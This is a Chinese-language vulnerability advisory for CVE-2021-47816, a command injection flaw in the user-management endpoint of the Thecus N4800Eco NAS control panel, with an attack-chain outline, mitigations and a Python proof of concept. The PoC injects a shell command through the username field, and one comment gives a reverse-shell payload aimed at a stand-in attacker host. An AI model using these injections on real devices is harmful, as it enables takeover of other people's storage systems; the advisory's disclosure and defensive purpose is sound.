IPBUF安全漏洞报告
English
CVE-2021-47816 CVSS 8.8 高危

CVE-2021-47816 Thecus N4800Eco NAS命令注入漏洞

披露日期: 2026-01-16
来源: [email protected]

漏洞信息

漏洞编号
CVE-2021-47816
漏洞类型
命令注入
CVSS评分
8.8 高危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
Thecus N4800Eco NAS Server Control Panel

相关标签

命令注入CVE-2021-47816ThecusNAS远程代码执行认证绕过网络存储设备

漏洞概述

CVE-2021-47816是Thecus N4800Eco NAS服务器控制面板中的一个高危命令注入漏洞,CVSS评分8.8。该漏洞存在于用户管理功能中,认证攻击者可以通过用户管理端点注入任意系统命令。攻击者利用用户名和批量用户创建参数注入shell命令,以管理员权限执行任意系统操作。受影响的设备为Thecus N4800Eco网络存储设备,攻击者需要低权限账户即可发起攻击,无需用户交互。漏洞披露于2026年1月16日,发现者为[email protected]

技术细节

该命令注入漏洞存在于Thecus N4800Eco NAS的用户管理功能中。漏洞源于控制面板对用户输入的验证不充分,攻击者可以在用户名参数中注入操作系统命令。攻击者通过发送特制的HTTP请求,在username字段中插入shell命令(如分号分隔的多条命令),系统会将用户输入直接传递给底层shell执行。批量用户创建功能同样存在此问题,攻击者可以利用批量创建参数注入恶意命令。由于NAS设备通常以root或高权限运行,攻击成功后可完全控制整个系统,包括读取敏感数据、安装后门或作为内网渗透的跳板。

攻击链分析

STEP 1
1
识别目标:扫描Thecus N4800Eco NAS设备,确认控制面板可访问
STEP 2
2
获取认证:使用低权限账户登录控制面板(默认凭据或已泄露凭据)
STEP 3
3
构造恶意请求:在用户创建/编辑请求的用户名参数中注入shell命令
STEP 4
4
触发漏洞:发送特制HTTP请求,系统解析参数时执行注入的命令
STEP 5
5
权限提升:命令以管理员权限执行,攻击者获得完全系统控制权
STEP 6
6
持久化控制:安装后门或修改系统配置,建立持久化访问通道

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # CVE-2021-47816 Thecus N4800Eco NAS Command Injection PoC # Target: Thecus N4800Eco NAS Server Control Panel # Vulnerability: Command Injection in user management target = "http://target-ip" username = "admin" password = "admin" # Authentication session = requests.Session() login_data = {"username": username, "password": password} login_url = f"{target}/login" session.post(login_url, data=login_data) # Command Injection via username parameter # Inject: ping -c 4 10.10.10.10 (DNS lookup for OOB testing) injected_username = "; ping -c 4 10.10.10.10; #" user_creation_url = f"{target}/api/user/add" payload = { "username": injected_username, "password": "test123", "email": "[email protected]" } response = session.post(user_creation_url, data=payload) print(f"Status: {response.status_code}") print(f"Response: {response.text}") # Reverse shell payload example: # username = "; bash -i >& /dev/tcp/attacker-ip/4444 0>&1; #"

影响范围

Thecus N4800Eco NAS Server Control Panel (all versions)

防御指南

临时缓解措施
在官方补丁发布前,建议采取以下临时措施:1) 立即更改所有默认账户密码为强密码;2) 限制管理接口的网络访问,仅允许受信任IP访问;3) 启用入侵检测/防御系统监控异常请求;4) 定期检查系统日志,排查可疑命令执行痕迹;5) 考虑部署Web应用防火墙过滤恶意请求参数。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表